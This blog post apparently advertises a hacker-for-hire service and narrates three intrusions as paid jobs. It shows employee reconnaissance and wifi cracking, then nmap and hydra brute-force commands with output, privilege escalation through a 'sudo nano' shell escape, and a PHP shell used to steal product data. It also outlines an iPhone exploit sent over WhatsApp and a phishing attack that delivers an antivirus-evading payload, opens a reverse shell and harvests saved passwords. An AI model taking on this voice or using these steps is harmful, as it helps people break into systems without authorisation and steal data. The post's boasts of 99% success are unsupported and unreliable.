A Professional Hacker Technique

A professional Hacker technique is not a secret weapon of successful hacking. It is hard work, patient, and proper usage of various hacking tools. The main weapon for a hacker is his problem-solving mindset and researching perfectly about whatever job is assigned for him(For example service from our Hacking services)! As a professional Hacker for Hire of Hacker Forces, I will show you 3 real-world examples.

Let’s Start!

This is How a Server Hacking Done!

Every computer can act as a server. The difference between Server computer and personal/user computer is, the server runs various service such as www.website.com running on a port 80, An SMTP, the IMAP server software is installed to receive and read the email such as [email protected], A remote administration may have installed by an admin to maintain the server from home or other places. The public server has a static or fixed address which is called IP(Internet Protocol) to reach over the internet.

A personal computer or an office user computer is for basic software use, internet browsing, and for doing the professional task. Some user/personal may or not have a fixed IP address and does not install various service as a server computer. So a Hacker usually, can’t directly connect to the user/personal computer over the internet as the address is always changed!

The Goal

Getting into Internal Network and see if it is possible to get all product details.

The only information we had about two employee

  • Name of the Employee.
  • Twitter account link of the employee.
  • Phone number of an employee.

The successful Hacker Technique

As a professional hacker for hire, I had to think out of the box! We started following two employee on twitter. Did lots of searches using the phone number and the names. Found the exact address and they are connected with WIFI for the internal network. Using Google map I viewed the building! I did manage to hack the wifi and connected to it and obtained private IP(192.168.27.136).

As a Tools all I had installed Kali Linux in my Laptop. Using a tool “netdiscover” i found some connected host. And finally i figured out then central server IP address is 192.168.27.136

I quickly scanned with nmap:

hackerforces.com$ nmap -p- -T5 192.168.27.137
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 13:51 EDT
Nmap scan report for 192.168.27.137
Host is up (0.00052s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
22/tcp open ssh
113/tcp open ident
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy

I found some interesting open ports are 113,139 and 445. Port 8080 was interesting to me! It had a web page with some information such as usernames. I quickly launched a brute force with hydra:

hackerforces.com$ hydra -L u.txt -P p.txt 192.168.27.137 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-11 12:55:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:3/p:4), ~1 try per task
[DATA] attacking ssh://192.168.27.137:22/
1 of 1 target completed, 0 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-11 12:55:41
hackerforces.com$ hydra -L u.txt -P p.txt 192.168.27.137 smb
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-11 12:55:49
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 12 login tries (l:3/p:4), ~12 tries per task
[DATA] attacking smb://192.168.27.137:445/
C

Seems I got blocked without any success. So I started exploiting more! I found an error and with that error i searched on Google and found an exploit in exploit-db helped me to extract username and password. Found password hash and crack and login to port 22(ssh) but it was a normal user. This means I can’t read all sensitive data, let alone uploading backdoor!

My next challenge was becoming root. I was enough lucky to find the root exploit using Linux command:

sudo -l

This command output that i can execute ‘nano’ as sudo. This was really bad idea allowing ‘nano’ to run as sudo. I quickly do(https://gtfobins.github.io/gtfobins/nano/):

nano -s /bin/sh /bin/sh 
^T

And i am root:

A Professional Hacker Technique 1

After this, uploaded a php shell with mysql access to retrive all product list from the target.

This was just a quick professional hacker technique. I had a chance to exploit these same vulnerabilities in real-world hacking. So what a hacker needs to do for a successful job?

  1. Collect as much public information as possible.
  2. Plan the attack.
  3. Start Enumerating the target.
  4. Find vulnerability with collected information(could be human or computer vulnerability).
  5. If not known vulnerability found, start fuzzing the same version software running on the target computer for 0day vulnerability.
  6. Find or write exploit as a successful hacker technique.
  7. If we got access as root, then it is fine but if as normal user then we need to find more post-exploitation vulnerability to become superuser. This is another challenge!

A Professional iPhone Hacker Technique

Apple Product is always in the first list of the market. iPhone is no exception here. Frankly, they made iPhone hacking a bit harder than hacking into android phones. But hacker forces, made this a bit easier. We made our own private tool as best iPhone hacker technique which is successful 99% of the time. Here Is one Hacker technique demonstration:

  1. A client gave us a number.
  2. The iPhone owner uses WhatsApp to communicate with her clients.
  3. We became a client and send our 0day exploit.
  4. Voila! We got shell without knowing the owner!

Successfully Hacking into a Corporate Email Account

There is no reason to hire a hacker at Hacker Forces if we don’t have successful hacker technique. Without creative thinking and better attack plan no hacker can be success! A hacker success may even depend on a simple word! Here is how we penetrated a corporate email account ethically:

  1. Only target email address provided.
  2. We gathered more information about the email.
  3. We collected possible passwords and started building trust to that target.
  4. Brute forced but failed and blocked.
  5. We managed to get the OS Version and Microsoft office version using various social engineering technique.
  6. To avoid Antivirus Detection We wrote our own exploit.
  7. Sent him download link, It was trusted file because not detected in virustotal.
  8. Downloaded, Opened, We got a reverse shell(Personal computer hacked!).
  9. From there, We have collected his browser history, and found the saved password!
  10. Successfully logged in to the email account without changing the password.

As professional hacker service provider, we continually need to research and create the attack plan. Hacking is not magic, it is trial and errors. If one hacking technique doesn’t work, we need to try another. It requires, proper research and creative mind. This is one of the reason for 99% of our success!

This is not possible to write every step in one post. But I have tried to highlight the real-world hacking experience in this post. If you have any questions, don’t hesitate to contact us!

Writer

Oliver – Special Team Member Of Hacker Force!

Leave a Comment